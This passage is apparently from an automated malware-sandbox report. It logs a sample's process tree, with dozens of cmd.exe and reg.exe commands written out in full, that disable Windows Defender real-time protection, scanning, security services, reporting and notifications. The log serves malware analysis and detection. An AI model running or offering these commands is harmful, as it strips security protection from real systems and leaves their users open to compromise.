    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleTime /f
    3⤵
    PID:8932
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v DisableUpdateOnStartupWithoutEngine /f"
  2⤵
  PID:3472
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v DisableUpdateOnStartupWithoutEngine /f
    3⤵
    PID:8292
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleDay /f"
  2⤵
  PID:3920
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleDay /f
    3⤵
    PID:8352
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleTime /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4456
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleTime /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4328
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v SignatureUpdateCatchupInterval /f"
  2⤵
  PID:3068
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v SignatureUpdateCatchupInterval /f
    3⤵
    PID:5020
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v DisableBlockAtFirstSeen /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3460
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v DisableBlockAtFirstSeen /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6840
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v LocalSettingOverrideSpynetReporting /f"
  2⤵
  PID:3624
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v LocalSettingOverrideSpynetReporting /f
    3⤵
    PID:4788
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /f"
  2⤵
  PID:2612
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /f
    3⤵
    PID:9116
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReportingLocation /f"
  2⤵
  PID:2460
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReportingLocation /f
    3⤵
    PID:8732
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /f"
  2⤵
  PID:2908
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /f
    3⤵
    PID:8376
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\Sense /v Start /t REG_DWORD /d 3 /f
  2⤵
  PID:4184
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\Sense /v Start /t REG_DWORD /d 3 /f
    3⤵
    - Modifies registry key
    PID:8100
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WinDefend /v Start /t REG_DWORD /d 2 /f
  2⤵
  PID:4592
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WinDefend /v Start /t REG_DWORD /d 2 /f
    3⤵
    - Modifies security service
    - Modifies registry key
    PID:9100
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\MsSecFlt /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:4020
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\MsSecFlt /v Start /t REG_DWORD /d 0 /f
    3⤵
    - Modifies registry key
    PID:8384
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService /v Start /t REG_DWORD /d 3 /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:244
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService /v Start /t REG_DWORD /d 3 /f
    3⤵
    - Modifies Security services
    - Modifies registry key
    PID:8368
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdBoot /v Start /t REG_DWORD /d 0 /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5036
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdBoot /v Start /t REG_DWORD /d 0 /f
    3⤵
    - Modifies Security services
    PID:9016
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdFilter /v Start /t REG_DWORD /d 0 /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4748
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdFilter /v Start /t REG_DWORD /d 0 /f
    3⤵
    - Modifies Security services
    PID:8824
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdNisDrv /v Start /t REG_DWORD /d 3 /f
  2⤵
  PID:4548
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdNisDrv /v Start /t REG_DWORD /d 3 /f
    3⤵
    - Modifies Security services
    - Modifies registry key
    PID:8832
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdNisSvc /v Start /t REG_DWORD /d 3 /f
  2⤵
  PID:1680
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdNisSvc /v Start /t REG_DWORD /d 3 /f
    3⤵
    - Modifies Security services
    - Modifies registry key
    PID:9076
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 1 /f
  2⤵
  PID:1112
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:7232
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 1 /f
  2⤵
  PID:4796
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:8340
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /t REG_BINARY /d 03,00,00,00,00,00,00,00,00,00,00,00 /f
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  PID:4800
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /t REG_BINARY /d 03,00,00,00,00,00,00,00,00,00,00,00 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:8148
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SecurityHealt /t REG_EXPAND_SZ /d %%windir%%\system32\SecurityHealthSystray.exe /f
  2⤵
  PID:1032
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SecurityHealt /t REG_EXPAND_SZ /d %C:\Windows%\system32\SecurityHealthSystray.exe /f
    3⤵
    - Adds Run key to start application
    PID:6636
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c %SYSTEMROOT%\System32\OneDriveSetup.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2340
- - C:\Windows\SysWOW64\OneDriveSetup.exe
    C:\Windows\System32\OneDriveSetup.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:7476
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c %SystemRoot%\SysWOW64\OneDriveSetup.exe
  2⤵
  PID:4388
- - C:\Windows\SysWOW64\OneDriveSetup.exe
    C:\Windows\SysWOW64\OneDriveSetup.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5452
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Security Health\State" /v AccountProtection_MicrosoftAccount_Disconnected /t REG_DWORD /d 0 /f"
  2⤵
  PID:5212
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Security Health\State" /v AccountProtection_MicrosoftAccount_Disconnected /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5416
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /t REG_DWORD /d 1 /f"
  2⤵
  PID:632
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender notification settings
    PID:4140
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f"
  2⤵
  PID:8736
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender notification settings
    PID:8396
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3568
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:2804
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f"
  2⤵
  PID:2172
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:8108
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f
    3⤵
    PID:2348
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v FirstAuGracePeriod /t REG_DWORD /d 0 /f"
  2⤵
  PID:7144
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v FirstAuGracePeriod /t REG_DWORD /d 0 /f
    3⤵
    PID:5888
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v DisablePrivacyMode /t REG_DWORD /d 1 /f"
  2⤵
  PID:5192
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v DisablePrivacyMode /t REG_DWORD /d 1 /f
    3⤵
    PID:3572
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Policies\Microsoft\MRT / v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
  2⤵
  PID:4336
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Policies\Microsoft\MRT / v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
    3⤵
    PID:4328
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontReportInfectionInformation /t REG_DWORD /d 1 /f
  2⤵
  PID:4912
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontReportInfectionInformation /t REG_DWORD /d 1 /f
    3⤵
    PID:8708
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v HideSystray /t REG_DWORD /d 1 /f"
  2⤵
  PID:8164
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v HideSystray /t REG_DWORD /d 1 /f
    3⤵
    PID:8484
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
  2⤵
  PID:7244
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6488
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:7528
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d 0 /f"
  2⤵
  PID:7772
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d 0 /f
    3⤵
    PID:2180
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v RandomizeScheduleTaskTimes /t REG_DWORD /d 0 /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6540
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v RandomizeScheduleTaskTimes /t REG_DWORD /d 0 /f
    3⤵
    PID:6096
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v DisableAutoExclusions /t REG_DWORD /d 1 /f"
  2⤵
  PID:6808
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v DisableAutoExclusions /t REG_DWORD /d 1 /f
    3⤵
    PID:2192
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /t REG_DWORD /d 0 /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:8016
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /t REG_DWORD /d 0 /f
    3⤵
    PID:5548
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v LocalSettingOverridePurgeItemsAfterDelay /t REG_DWORD /d 0 /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:8156
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:9084
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v LocalSettingOverridePurgeItemsAfterDelay /t REG_DWORD /d 0 /f
    3⤵
    PID:3856
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v PurgeItemsAfterDelay /t REG_DWORD /d 0 /f"
  2⤵
  PID:8152
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v PurgeItemsAfterDelay /t REG_DWORD /d 0 /f
    3⤵
    PID:8104
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f"
  2⤵
  PID:8856
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:2336
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d 1 /f"
  2⤵
  PID:7376
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:5384
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f"
  2⤵
  PID:6548
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:8084
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f"
  2⤵
  PID:4548
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:8280
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f"
  2⤵
  PID:6068
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:8748
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f"
  2⤵
  PID:5904
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:9176
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /t REG_DWORD /d 1 /f"
  2⤵
  PID:1036
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:7416
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleDay /t REG_DWORD /d 8 /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:7072
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleDay /t REG_DWORD /d 8 /f
    3⤵
    PID:6640
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleTime /t REG_DWORD /d 0 /f"
  2⤵
  PID:5756
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleTime /t REG_DWORD /d 0 /f
    3⤵
    PID:6436
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v AdditionalActionTimeOut /t REG_DWORD /d 0 /f"
  2⤵
  PID:2564
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v AdditionalActionTimeOut /t REG_DWORD /d 0 /f
    3⤵
    PID:2112
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v CriticalFailureTimeOut /t REG_DWORD /d 0 /f"
  2⤵
  PID:1832
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v CriticalFailureTimeOut /t REG_DWORD /d 0 /f
    3⤵
    PID:6124
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f"
  2⤵
  PID:6736
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
    3⤵
    PID:3248
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableGenericRePorts /t REG_DWORD /d 1 /f"
  2⤵
  PID:7268
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableGenericRePorts /t REG_DWORD /d 1 /f
    3⤵
    PID:6592
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v NonCriticalTimeOut /t REG_DWORD /d 0 /f"
  2⤵
  PID:348
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v NonCriticalTimeOut /t REG_DWORD /d 0 /f
    3⤵
    PID:6816
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v AvgCPULoadFactor /t REG_DWORD /d 10 /f"
  2⤵
  PID:6032
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v AvgCPULoadFactor /t REG_DWORD /d 10 /f
    3⤵
    PID:6468
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableArchiveScanning /t REG_DWORD /d 1 /f"
  2⤵
  PID:8952
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableArchiveScanning /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3080
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupFullScan /t REG_DWORD /d 1 /f"
  2⤵
  PID:904
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupFullScan /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1384
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupQuickScan /t REG_DWORD /d 1 /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6596
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupQuickScan /t REG_DWORD /d 1 /f
    3⤵
    PID:5056
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRemovableDriveScanning /t REG_DWORD /d 1 /f"
  2⤵
  PID:2968
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRemovableDriveScanning /t REG_DWORD /d 1 /f
    3⤵
    PID:5596
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRestorePoint /t REG_DWORD /d 1 /f"
  2⤵
  PID:7828
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRestorePoint /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5960
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningMappedNetworkDrivesForFullScan /t REG_DWORD /d 1 /f"
  2⤵
  PID:6380
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningMappedNetworkDrivesForFullScan /t REG_DWORD /d 1 /f
    3⤵
    PID:7372
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningNetworkFiles /t REG_DWORD /d 1 /f"
  2⤵
  PID:6496
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningNetworkFiles /t REG_DWORD /d 1 /f
    3⤵
    PID:4184
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v PurgeItemsAfterDelay /t REG_DWORD /d 0 /f"
  2⤵
  PID:6472
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v PurgeItemsAfterDelay /t REG_DWORD /d 0 /f
    3⤵
    PID:4828
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanOnlyIfIdle /t REG_DWORD /d 0 /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2616
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanOnlyIfIdle /t REG_DWORD /d 0 /f
    3⤵
    PID:5252
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanParameters /t REG_DWORD /d 0 /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4956
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanParameters /t REG_DWORD /d 0 /f
    3⤵
    PID:6540
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleDay /t REG_DWORD /d 8 /f"
  2⤵
  PID:3668
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleDay /t REG_DWORD /d 8 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:9212
